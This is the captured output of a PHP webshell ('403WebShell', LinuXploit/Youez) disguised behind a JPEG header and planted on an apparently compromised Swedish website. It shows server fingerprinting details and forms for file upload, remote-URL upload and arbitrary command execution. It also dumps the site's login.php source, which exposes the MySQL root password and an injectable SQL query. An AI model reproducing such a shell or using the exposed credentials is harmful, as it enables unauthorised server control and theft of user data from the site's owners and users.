????JFIF?


?x?x????'<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>79.136.114.73</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.61</font><br>Web Server : <font color='#df5'>Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f</font><br>System : <font color='#df5'>Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64</font><br>User : <font color='#df5'>www-data&nbsp;</font>( <font color='#df5'>33</font>)<br>PHP Version : <font color='#df5'>5.5.9-1ubuntu4.29</font><br>Disable Function : <font color='red'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,</font></font><br>MySQL : <font color=green>ON</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=green>ON</font> &nbsp;|&nbsp; Pkexec : <font color=green>ON</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/var">var</a>/<a href="?loknya=/var/www">www</a>/<a href="?loknya=/var/www/evacuationplans.astacus.se">evacuationplans.astacus.se</a>/<a href="?loknya=/var/www/evacuationplans.astacus.se/login">login</a>/<a href="?loknya=/var/www/evacuationplans.astacus.se/login/mobile">mobile</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/data/thumbs/uploads.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /var/www/evacuationplans.astacus.se/login/mobile/login.php</tr></td></table><br/><pre>&lt;?php

session_start();
session_regenerate_id();
		
$username = $_POST['username'];
$password = $_POST['password'];

$password = stripslashes($password);
$username = stripslashes($username);
$password = mysql_real_escape_string($password);
$username = mysql_real_escape_string($username);

$password_sha = base64_encode(sha1($password,TRUE));

$link = mysql_connect (&quot;localhost&quot;, &quot;root&quot;, &quot;root123&quot;);
mysql_select_db (&quot;vpa&quot;);
		

 if(strlen($username) &lt; 5){
	header(&quot;Location: index.php?message=Fel användarnamn eller lösenord!&quot;);
	exit;
}

$sql = &quot;select * from SystemUser where Username = '&quot;.$username.&quot;' and Password = '&quot;.$password_sha.&quot;'&quot;;
				
$result = mysql_query($sql);

if(mysql_num_rows($result) &gt; 0) {
	// User found, we are logged in
	$userdata = mysql_fetch_assoc($result);
	$my_array =  array($userdata['SystemUserId'],$userdata['CompanyId'],$userdata['Name'],$userdata['Username'],$userdata['UserGroupId'],$userdata['Phone']);
	$_SESSION['EP_SSO_INFO']  = $my_array;
	
	 header(&quot;Location: start.php&quot;);
	 exit;
}


header(&quot;Location: index.php?message=Fel användarnamn eller lösenord!&quot;);

?&gt;
	
    
    </pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>